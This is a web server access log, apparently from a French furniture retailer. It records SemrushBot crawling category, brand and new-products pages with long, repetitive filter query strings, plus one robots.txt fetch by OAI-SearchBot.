85.208.96.206 - - [20/Aug/2026:05:42:00 +0200] "GET /new-products.php?a=24&b=1&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=24&histo_track=1&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&x17=0&x17=1&x20=0&x20=0&x20=0&x20=1&x21=1&x22=0&x22=1&x23=0&x23=1 HTTP/1.1" 200 137291 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.6 - - [20/Aug/2026:05:42:13 +0200] "GET /new-products.php?a=24&a=24&a=24&b=1&b=1&b=1&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=24&histo_track=1&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&x17=1&x20=0&x20=0&x20=0&x20=0&x20=1&x5=0&x5=1 HTTP/1.1" 200 89547 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.4 - - [20/Aug/2026:05:42:15 +0200] "GET /marques.php?a=24&a=24&a=24&a=24&a=24&a=25&a=25&b=1&b=1&b=1&b=1&b=1&b=1&b=1&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=25&seo=20-lits-gigognes&seo_marq=20&seo_marq=20&seo_marq=20&seo_marq=20&seo_marq=20&seo_marq=20&seo_marq=20&seo_marq=20&t47=0&t47=0&t47=0&t47=0&t47=1&t62=0&t62=0&t62=1 HTTP/1.1" 200 64292 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.206 - - [20/Aug/2026:05:42:18 +0200] "GET /category.php?a=25&a=25&a=25&a=25&b=1&b=1&b=1&b=1&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=25&seo=47-lits-gigognes&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&t58=1&t59=1&t60=1&x20=0&x20=0&x20=0&x20=1&x5=0&x5=1 HTTP/1.1" 200 70293 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.194 - - [20/Aug/2026:05:42:53 +0200] "GET /category.php?a=24&a=24&a=24&a=24&b=1&b=1&b=1&b=1&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=24&seo=47-lits-gigognes&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&t58=0&t58=1&t59=0&t59=0&t59=1&t60=1&x20=0&x20=1&x5=1 HTTP/1.1" 200 70229 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.210 - - [20/Aug/2026:05:43:00 +0200] "GET /new-products.php?a=24&a=24&a=25&b=1&b=1&b=1&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=25&histo_track=1&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&x17=1&x20=0&x20=1&x21=0&x21=1&x23=0&x23=1&x5=0&x5=0&x5=0&x5=1 HTTP/1.1" 200 161306 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.194 - - [20/Aug/2026:05:43:41 +0200] "GET /new-products.php?a=24&a=24&a=24&b=1&b=1&b=1&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=24&histo_track=1&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&x17=0&x17=0&x17=0&x17=1&x20=0&x20=0&x20=0&x20=1&x23=0&x23=1&x5=1 HTTP/1.1" 200 96674 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.205 - - [20/Aug/2026:05:43:54 +0200] "GET /new-products.php?a=24&a=24&a=24&b=1&b=1&b=1&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=24&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&x17=0&x17=1&x20=1&x21=1&x22=1&x23=0&x23=1&x5=0&x5=1 HTTP/1.1" 200 165772 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.15 - - [20/Aug/2026:05:43:59 +0200] "GET /new-products.php?debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&x20=0&x20=0&x20=0&x20=0&x20=1&x5=0&x5=0&x5=0&x5=0&x5=0&x5=0&x5=0&x5=1 HTTP/1.1" 200 199869 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.209 - - [20/Aug/2026:05:44:04 +0200] "GET /new-products.php?a=24&a=24&a=24&a=25&a=25&a=25&a=25&b=1&b=1&b=1&b=1&b=1&b=1&b=1&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=25&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&x17=0&x17=1&x20=1&x21=1&x23=1&x5=0&x5=0&x5=1 HTTP/1.1" 200 160954 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.4 - - [20/Aug/2026:05:44:07 +0200] "GET /new-products.php?a=25&b=1&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=25&histo_track=1&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&x17=0&x17=0&x17=1&x20=0&x20=0&x20=1&x23=0&x23=0&x23=0&x23=1 HTTP/1.1" 200 64079 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.4 - - [20/Aug/2026:05:44:07 +0200] "GET /new-products.php?a=25&b=1&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=25&histo_track=1&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&x17=0&x17=0&x17=1&x20=0&x20=0&x20=1&x23=0&x23=0&x23=0&x23=1 HTTP/1.1" 200 64095 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.14 - - [20/Aug/2026:05:44:21 +0200] "GET /new-products.php?debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&histo_track=1&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&x17=0&x17=0&x17=0&x17=0&x17=1&x23=0&x23=0&x23=0&x23=0&x23=1 HTTP/1.1" 200 100378 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.2 - - [20/Aug/2026:05:44:37 +0200] "GET /category.php?a=24&a=24&b=1&b=1&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=24&seo=47-lits-gigognes&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&t58=0&t58=1&t59=1&t60=0&t60=0&t60=0&t60=0&t60=1&x5=0&x5=1 HTTP/1.1" 200 70265 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.7 - - [20/Aug/2026:05:44:47 +0200] "GET /new-products.php?a=24&a=24&a=24&a=24&a=24&a=24&b=1&b=1&b=1&b=1&b=1&b=1&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=24&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&x17=0&x17=1&x20=0&x20=0&x20=1&x21=0&x21=1&x23=1 HTTP/1.1" 200 137378 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.13 - - [20/Aug/2026:05:45:16 +0200] "GET /category.php?a=24&a=24&a=25&a=25&a=25&a=25&a=25&b=1&b=1&b=1&b=1&b=1&b=1&b=1&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=25&seo=47-lits-gigognes&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&t59=0&t59=0&t59=1&t60=1&x20=0&x20=0&x20=1 HTTP/1.1" 200 70321 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.210 - - [20/Aug/2026:05:45:18 +0200] "GET /category.php?a=24&b=1&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=24&seo=47-lits-gigognes&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&t58=0&t58=1&t59=1&t60=1&t62=0&t62=1&x5=0&x5=1 HTTP/1.1" 200 69931 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.13 - - [20/Aug/2026:05:45:34 +0200] "GET /new-products.php?a=24&a=25&a=25&b=1&b=1&b=1&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=25&histo_track=1&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&x17=1&x20=0&x20=0&x20=0&x20=1&x21=0&x21=0&x21=0&x21=1&x22=1&x5=0&x5=1 HTTP/1.1" 200 155341 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.8 - - [20/Aug/2026:05:45:56 +0200] "GET /new-products.php?a=24&b=1&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=24&histo_track=1&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&x17=0&x17=0&x17=0&x17=1&x20=0&x20=0&x20=1&x21=0&x21=0&x21=1&x5=1 HTTP/1.1" 200 159888 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.1 - - [20/Aug/2026:05:46:19 +0200] "GET /new-products.php?a=24&a=25&b=1&b=1&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=25&histo_track=1&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&x20=0&x20=1&x21=0&x21=0&x21=1&x23=1&x5=0&x5=1 HTTP/1.1" 200 130470 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.18 - - [20/Aug/2026:05:46:24 +0200] "GET /new-products.php?a=24&a=24&a=24&a=24&a=25&a=25&b=1&b=1&b=1&b=1&b=1&b=1&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=25&histo_track=1&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&x17=0&x17=0&x17=1&x20=0&x20=0&x20=1&x21=1&x5=1 HTTP/1.1" 200 154424 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.201 - - [20/Aug/2026:05:46:41 +0200] "GET /category.php?a=24&b=1&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=24&histo_track=1&seo=47-lits-gigognes&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&t58=0&t58=1&t59=0&t59=0&t59=1&t60=0&t60=0&t60=1&x20=0&x20=1 HTTP/1.1" 200 70187 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.11 - - [20/Aug/2026:05:46:51 +0200] "GET /new-products.php?a=24&a=24&a=24&a=24&b=1&b=1&b=1&b=1&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=24&histo_track=1&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&x17=0&x17=0&x17=1&x20=1&x23=0&x23=0&x23=1&x5=0&x5=0&x5=1 HTTP/1.1" 200 96654 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.19 - - [20/Aug/2026:05:47:22 +0200] "GET /new-products.php?a=24&a=24&a=24&a=24&a=24&a=24&a=24&a=24&b=1&b=1&b=1&b=1&b=1&b=1&b=1&b=1&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=24&histo_track=1&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&x17=0&x17=0&x17=1&x20=1&x21=1&x23=0&x23=1 HTTP/1.1" 200 137872 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.15 - - [20/Aug/2026:05:47:50 +0200] "GET /marques.php?a=24&b=1&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=24&seo=20-lits-gigognes&seo_marq=20&seo_marq=20&seo_marq=20&seo_marq=20&seo_marq=20&seo_marq=20&seo_marq=20&seo_marq=20&seo_marq=20&seo_marq=20&seo_marq=20&seo_marq=20&t47=0&t47=1&t58=0&t58=0&t58=0&t58=0&t58=1&t59=1&t62=0&t62=0&t62=0&t62=1 HTTP/1.1" 200 64384 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.2 - - [20/Aug/2026:05:48:03 +0200] "GET /new-products.php?a=24&a=24&a=24&a=25&a=25&a=25&a=25&b=1&b=1&b=1&b=1&b=1&b=1&b=1&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=25&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&x20=1&x21=0&x21=0&x21=1&x22=0&x22=1&x23=1&x5=0&x5=1 HTTP/1.1" 200 132119 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.8 - - [20/Aug/2026:05:48:10 +0200] "GET /new-products.php?debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&x20=0&x20=0&x20=0&x20=0&x20=1&x21=0&x21=1&x5=0&x5=0&x5=0&x5=1 HTTP/1.1" 200 206111 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.8 - - [20/Aug/2026:05:48:11 +0200] "GET /new-products.php?debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&x20=0&x20=0&x20=0&x20=0&x20=1&x21=0&x21=1&x5=0&x5=0&x5=0&x5=1 HTTP/1.1" 200 206123 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.1 - - [20/Aug/2026:05:48:13 +0200] "GET /category.php?debut=0&debut=0&debut=0&seo=47-lits-gigognes&seo_cat=47&seo_cat=47&seo_cat=47&t58=1&t59=1&x20=1 HTTP/1.1" 200 162081 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.13 - - [20/Aug/2026:05:48:25 +0200] "GET /new-products.php?a=24&a=24&a=24&b=1&b=1&b=1&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=24&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&x17=0&x17=1&x20=0&x20=0&x20=0&x20=1&x21=0&x21=1&x23=1&x5=0&x5=1 HTTP/1.1" 200 166784 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.204 - - [20/Aug/2026:05:48:46 +0200] "GET /category.php?a=25&b=1&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=25&seo=47-lits-gigognes&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&t58=0&t58=0&t58=0&t58=1&t60=0&t60=0&t60=1&x20=0&x20=0&x20=0&x20=0&x20=1 HTTP/1.1" 200 70397 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.14 - - [20/Aug/2026:05:48:54 +0200] "GET /robots.txt HTTP/1.1" 200 135 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.19 - - [20/Aug/2026:05:48:54 +0200] "GET /marques.php?a=24&a=24&a=24&a=24&b=1&b=1&b=1&b=1&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=24&histo_track=1&seo=20-lits-gigognes&seo_marq=20&seo_marq=20&seo_marq=20&seo_marq=20&seo_marq=20&seo_marq=20&seo_marq=20&seo_marq=20&seo_marq=20&seo_marq=20&t47=0&t47=1&t58=0&t58=1&t59=0&t59=0&t59=0&t59=1&t62=0&t62=1 HTTP/1.1" 200 64332 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.19 - - [20/Aug/2026:05:48:55 +0200] "GET /marques.php?a=24&a=24&a=24&a=24&b=1&b=1&b=1&b=1&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=24&histo_track=1&seo=20-lits-gigognes&seo_marq=20&seo_marq=20&seo_marq=20&seo_marq=20&seo_marq=20&seo_marq=20&seo_marq=20&seo_marq=20&seo_marq=20&seo_marq=20&t47=0&t47=1&t58=0&t58=1&t59=0&t59=0&t59=0&t59=1&t62=0&t62=1 HTTP/1.1" 200 64346 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.16 - - [20/Aug/2026:05:49:02 +0200] "GET /new-products.php?a=24&a=24&a=24&a=24&b=1&b=1&b=1&b=1&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=24&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&x17=0&x17=1&x20=0&x20=1&x21=0&x21=0&x21=0&x21=1&x23=1&x5=0&x5=1 HTTP/1.1" 200 167170 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.211 - - [20/Aug/2026:05:49:10 +0200] "GET /new-products.php?a=24&a=25&b=1&b=1&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=25&histo_track=1&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&x20=0&x20=0&x20=1&x23=1&x5=0&x5=0&x5=0&x5=0&x5=1 HTTP/1.1" 200 63957 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.203 - - [20/Aug/2026:05:49:18 +0200] "GET /new-products.php?debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&x17=0&x17=0&x17=0&x17=1&x23=0&x23=1&x5=0&x5=0&x5=0&x5=0&x5=0&x5=0&x5=1 HTTP/1.1" 200 129918 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.197 - - [20/Aug/2026:05:49:39 +0200] "GET /new-products.php?a=24&a=24&a=24&a=25&b=1&b=1&b=1&b=1&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=24&debut=25&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&x17=1&x20=0&x20=1&x21=0&x21=0&x21=1&x22=0&x22=0&x22=1&x5=0&x5=1 HTTP/1.1" 200 154788 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.195 - - [20/Aug/2026:05:50:06 +0200] "GET /category.php?a=24&a=24&b=1&b=1&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=24&seo=47-lits-gigognes&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&t58=0&t58=1&t59=1&t60=0&t60=1&t62=0&t62=1&x20=0&x20=0&x20=0&x20=1&x5=1 HTTP/1.1" 200 70441 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.202 - - [20/Aug/2026:05:50:13 +0200] "GET /category.php?a=24&a=24&a=24&b=1&b=1&b=1&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=24&seo=47-lits-gigognes&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&t58=0&t58=0&t58=1&t59=0&t59=0&t59=0&t59=0&t59=0&t59=0&t59=1 HTTP/1.1" 200 70364 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.5 - - [20/Aug/2026:05:50:25 +0200] "GET /new-products.php?a=24&a=24&a=24&a=24&b=1&b=1&b=1&b=1&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=24&histo_track=1&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&x17=1&x20=0&x20=1&x23=1&x5=0&x5=1 HTTP/1.1" 200 95499 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.207 - - [20/Aug/2026:05:50:30 +0200] "GET /new-products.php?a=24&b=1&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=24&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&x17=0&x17=0&x17=0&x17=0&x17=0&x17=0&x17=0&x17=1&x20=1&x21=0&x21=1&x5=1 HTTP/1.1" 200 160150 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.211 - - [20/Aug/2026:05:50:49 +0200] "GET /category.php?a=24&a=24&a=24&a=24&a=24&b=1&b=1&b=1&b=1&b=1&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=24&seo=47-lits-gigognes&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&t58=1&t59=0&t59=0&t59=1&t60=0&t60=0&t60=1&x20=1 HTTP/1.1" 200 70191 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
104.210.140.129 - - [20/Aug/2026:05:50:55 +0200] "GET /robots.txt HTTP/1.1" 200 135 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.0; +https://openai.com/searchbot"
85.208.96.209 - - [20/Aug/2026:05:50:56 +0200] "GET /new-products.php?a=24&a=24&b=1&b=1&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=24&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&x17=1&x20=1&x21=1&x22=1&x23=0&x23=0&x23=0&x23=0&x23=0&x23=1&x5=1 HTTP/1.1" 200 166618 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.206 - - [20/Aug/2026:05:51:02 +0200] "GET /new-products.php?debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&x17=1&x21=0&x21=0&x21=0&x21=0&x21=0&x21=0&x21=0&x21=1&x22=1&x23=0&x23=0&x23=1&x5=0&x5=1 HTTP/1.1" 200 201513 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.12 - - [20/Aug/2026:05:51:09 +0200] "GET /new-products.php?a=24&a=24&b=1&b=1&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=24&histo_track=1&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&x17=0&x17=0&x17=0&x17=0&x17=0&x17=0&x17=0&x17=1&x20=1&x5=1 HTTP/1.1" 200 89863 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.200 - - [20/Aug/2026:05:51:48 +0200] "GET /new-products.php?a=24&a=24&a=24&a=24&a=24&a=24&b=1&b=1&b=1&b=1&b=1&b=1&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=24&histo_track=1&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&x17=1&x20=0&x20=0&x20=0&x20=0&x20=1&x22=0&x22=1&x23=1 HTTP/1.1" 200 64322 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.200 - - [20/Aug/2026:05:51:48 +0200] "GET /new-products.php?a=24&a=24&a=24&a=24&a=24&a=24&b=1&b=1&b=1&b=1&b=1&b=1&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=24&histo_track=1&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&x17=1&x20=0&x20=0&x20=0&x20=0&x20=1&x22=0&x22=1&x23=1 HTTP/1.1" 200 64386 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
